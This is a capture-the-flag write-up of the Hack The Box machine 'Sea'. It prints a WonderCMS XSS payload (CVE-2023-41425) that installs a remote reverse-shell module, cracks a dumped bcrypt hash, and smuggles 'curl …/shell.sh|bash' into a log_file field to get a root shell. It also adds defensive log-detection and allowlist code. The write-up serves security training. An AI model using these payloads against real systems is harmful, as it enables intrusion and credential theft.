Hackthebox: Sea

Foued SAIDI

Overview

Sea is an easy-difficulty machine from Hack The Box. It starts with CVE-2023-41425, a cross-site scripting (XSS) vulnerability in WonderCMS that we chain into remote code execution, which then lets us read the CMS database file and recover a password hash. Finally, we abuse a command injection in an internal monitoring service running as root to pwn the machine.

Sea-info-card

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.77.74 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-20 07:54 W. Central Africa Standard Time
Nmap scan report for 10.129.77.74
Host is up (0.29s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.97 seconds

We can see the usual pair of ports: 22 for SSH and 80 for HTTP, with no apparent redirect on the web server.

Web Application - http://10.129.77.74

We are prompted with a simple web application without any clear features:

Web Application

Checking the contact button, we can see it redirects to http://sea.htb/contact.php, so let’s add sea.htb to our /etc/hosts file.

Then I simply right-clicked the cover picture and searched for it on Google, hoping to find something interesting:

Web Application

And I did! This turns out to be a CMS called WonderCMS, and the very first result also points us to a CVE for it! How lucky are we lol.

CVE-2023-41425

CVE-2023-41425 is a Cross-Site Scripting (XSS) vulnerability in WonderCMS v3.2.0 through v3.4.2 that allows arbitrary code execution: the injected script drives the authenticated admin’s browser to install a malicious module through the installModule feature.

This will be our xss.js code:

var url = "http://sea.htb/loginURL";
if (url.endsWith("/")) {
    url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase + "/?installModule=http://10.10.x.x/revshell-main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
    if (xhr3.status == 200) {
        var xhr4 = new XMLHttpRequest();
        xhr4.withCredentials = true;
        xhr4.open("GET", urlWithoutLogBase + "/themes/revshell-main/rev.php");
        xhr4.send();
        xhr4.onload = function() {
            if (xhr4.status == 200) {
                var ip = "10.10.x.x";
                var port = "9001";
                var xhr5 = new XMLHttpRequest();
                xhr5.withCredentials = true;
                xhr5.open("GET", urlWithoutLogBase + "/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
                xhr5.send();
            }
        };
    }
};

We host xss.js (and revshell-main.zip) on a local Python web server, then wait for the target to fetch our revshell-main.zip file once the script runs in the admin’s browser.
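From the defender’s side, the chain above leaves a clear trail in the Apache access log: an installModule request whose source URL points at a host the site never installs from, followed by a direct hit on a freshly dropped PHP file under /themes/ carrying callback parameters. The following detection script is an added example of mine, not part of this writeup or of WonderCMS; it assumes the combined log format and treats the github.com hosts as the only legitimate module source, which is an assumption you would adjust for your own site. The sample log lines are constructed, not taken from the box.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hosts from which module/theme installs are expected. Assumption for this example:
# the site only ever installs modules from the official GitHub repositories.
TRUSTED_MODULE_HOSTS = {"github.com", "codeload.github.com"}

# Apache combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access log (not from the box): a normal login page hit, one
# legitimate module install from GitHub, one install from an arbitrary host, and
# then a request to the dropped PHP file with callback parameters.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Dec/2024:08:01:10 +0000] "GET /loginURL HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
127.0.0.1 - - [20/Dec/2024:08:02:41 +0000] "GET /?installModule=https://github.com/example-org/plugin/archive/master.zip&directoryName=plugins&type=plugins&token=abc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [20/Dec/2024:08:03:02 +0000] "GET /?installModule=http://10.10.14.5/revshell-main.zip&directoryName=violet&type=themes&token=abc HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [20/Dec/2024:08:03:05 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.5&lport=9001 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into request fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parsed.path,
        "query": parse_qs(parsed.query),
        "status": int(m.group("status")),
    }


def check_request(req):
    """Return a list of (rule, detail) findings for one parsed request."""
    findings = []
    q = req["query"]
    # Rule 1: a module/theme install pulled from a host outside the allowlist.
    for src in q.get("installModule", []):
        host = urlparse(src).hostname or ""
        if host not in TRUSTED_MODULE_HOSTS:
            findings.append(("untrusted-installModule", host))
    # Rule 2: a PHP file under themes/ or plugins/ requested with callback-style parameters.
    callback_params = {"lhost", "lport", "cmd", "c"}
    if re.match(r"^/(themes|plugins)/.+\.php$", req["path"]) and q.keys() & callback_params:
        findings.append(("uploaded-php-with-callback-params", req["path"]))
    return findings


def analyze_log(text):
    """Run both rules over every parseable line; returns (ip, ts, rule, detail) tuples."""
    results = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for rule, detail in check_request(req):
            results.append((req["ip"], req["ts"], rule, detail))
    return results


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit)
```

Rule 1 on its own is noisy if administrators legitimately install from other places, so the allowlist has to match your deployment; rule 2 is the higher-confidence signal, since theme and plugin files are not normally called with lhost/lport-style parameters at all.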

And we have our reverse shell!!
Once we’re in, I start looking through the database files for anything of interest:

www-data@sea:/var/www/sea/data$ cat database.js
cat database.js
{
"config": {
"siteTitle": "Sea",
"theme": "bike",
"defaultPage": "home",
"login": "loginURL",
"forceLogout": false,
"forceHttps": false,
"saveChangesPopup": false,
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
"lastLogins": {
"2024\/08\/11 11:17:32": "127.0.0.1",
"2024\/08\/11 11:17:02": "127.0.0.1",
"2024\/08\/11 11:15:32": "127.0.0.1",
"2024\/08\/11 11:15:02": "127.0.0.1",

And I got a bcrypt password hash, which we can simply crack using John the Ripper:

┌──(kali㉿kali)-[~/hackthebox/sea]
└─$ echo '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' > hash.txt 1 ⨯

┌──(kali㉿kali)-[~/hackthebox/sea]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:14 DONE (2024-08-11 07:28) 0.06798g/s 208.0p/s 208.0c/s 208.0C/s iamcool..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I can now SSH into the machine as amay, the user we find in the home directory, using the cracked password, and grab our user flag:

amay@sea:~$ cat user.txt
e795f4db1c6f32******************
amay@sea:~$ id
uid=1000(amay) gid=1000(amay) groups=1000(amay)
amay@sea:~$

Privilege Escalation to root

Checking the available network services running, I find an intriguing port 8080:

amay@sea:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:51151 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:56026 TIME_WAIT timewait (25.42/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:43684 TIME_WAIT timewait (34.45/0/0)
tcp 0 0 127.0.0.1:8080 127.0.0.1:43670 TIME_WAIT timewait (31.44/0/0)

Let’s forward that port to our local machine and check what it has for us:
ssh amay@sea.htb -L 8080:localhost:8080

And we are prompted to enter a username and a password:

Privesc

So let’s log in to it using amay’s creds.

And it looks like some sort of internal monitoring service:

Privesc

One of its features lets us view the access.log file. Let’s intercept the web request it makes to understand what’s actually going on under the hood:

POST / HTTP/1.1
Host: localhost:8080
Content-Length: 57
Cache-Control: max-age=0
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log&analyze_log=

We can see that the file name is passed in a log_file parameter. Maybe we can tamper with it to achieve RCE?
Let’s try to make the service send a request to our local server through it:

POST / HTTP/1.1
Host: localhost:8080
Content-Length: 57
Cache-Control: max-age=0
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

log_file==;curl+10.10.x.x&analyze_log=

And we get a callback:

PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.77.74 - - [20/Dec/2024 09:07:51] "GET / HTTP/1.1" 200 -

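The callback confirms that whatever the monitoring service does with log_file, the value ends up in a shell. The fix is not to filter characters out of a shell command but to never build one from user input: map the submitted value onto a fixed allowlist of log paths and read the file directly. The code below is an added example of mine, not the box’s service (whose source is not shown in this writeup); it assumes a Python web app and an illustrative allowlist, and it includes a small triage helper that flags request bodies like the one above for your own logs.

```python
import re
from urllib.parse import parse_qs

# Log files the monitoring page may display. Assumption for this example: the real
# service's list is unknown, so these two entries are illustrative.
ALLOWED_LOGS = {
    "access": "/var/log/apache2/access.log",
    "error": "/var/log/apache2/error.log",
}

# Characters that have no business in a file name chosen from a fixed menu.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")


class RejectedInput(ValueError):
    """Raised when the submitted log_file value is not one of the allowed paths."""


def select_log(form_body):
    """Map the log_file form field onto an allowlisted path, or raise RejectedInput."""
    fields = parse_qs(form_body, keep_blank_values=True)
    values = fields.get("log_file", [])
    if len(values) != 1:
        raise RejectedInput("exactly one log_file value expected")
    requested = values[0]
    # Exact string match against the allowlist: no normalisation, no '..' handling needed,
    # because anything that is not literally one of our paths is refused.
    for path in ALLOWED_LOGS.values():
        if requested == path:
            return path
    raise RejectedInput(f"log_file not in allowlist: {requested!r}")


def looks_like_injection(form_body):
    """Triage helper: True if the raw log_file value carries shell metacharacters."""
    fields = parse_qs(form_body, keep_blank_values=True)
    return any(SHELL_META.search(v) is not None for v in fields.get("log_file", []))


def analyze_log_safely(form_body, max_lines=100):
    """Read the selected log without a shell: no string is ever handed to /bin/sh."""
    path = select_log(form_body)
    with open(path, "r", errors="replace") as fh:
        lines = []
        for line in fh:
            lines.append(line.rstrip("\n"))
            if len(lines) >= max_lines:
                break
        return lines


if __name__ == "__main__":
    # The legitimate body from the intercepted request, and a tampered one (both as on the page).
    good = "log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log&analyze_log="
    bad = "log_file==;curl+10.10.x.x&analyze_log="
    print("good ->", select_log(good), "| injection?", looks_like_injection(good))
    try:
        select_log(bad)
    except RejectedInput as exc:
        print("bad  -> rejected:", exc, "| injection?", looks_like_injection(bad))
```

Two design points worth noting: the allowlist compares exact strings rather than trying to sanitise a path, so traversal attempts such as /var/log/apache2/../../../etc/shadow are refused along with the shell payload; and running the service as root is a separate defect, since even a perfectly validated reader should only be able to open the log files it is meant to show.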

So let’s get that reverse shell ;)

POST / HTTP/1.1
Host: localhost:8080
Content-Length: 42
Cache-Control: max-age=0
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
sec-ch-ua: "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

log_file==;curl+10.10.x.x/shell.sh|bash&analyze_log=

And here’s our root flag:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.77.74] 35876
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
# 1713afca5f7346******************
#

And that was it for Sea! Hope you enjoyed it.
-0xkujen

  • Title: Hackthebox: Sea
  • Author: Foued SAIDI
  • Created at : 2024-12-20 07:48:46
  • Updated at : 2024-12-20 09:14:04
  • Link: https://kujen5.github.io/2024/12/20/Hackthebox-Sea/
  • License: This work is licensed under CC BY-NC-SA 4.0.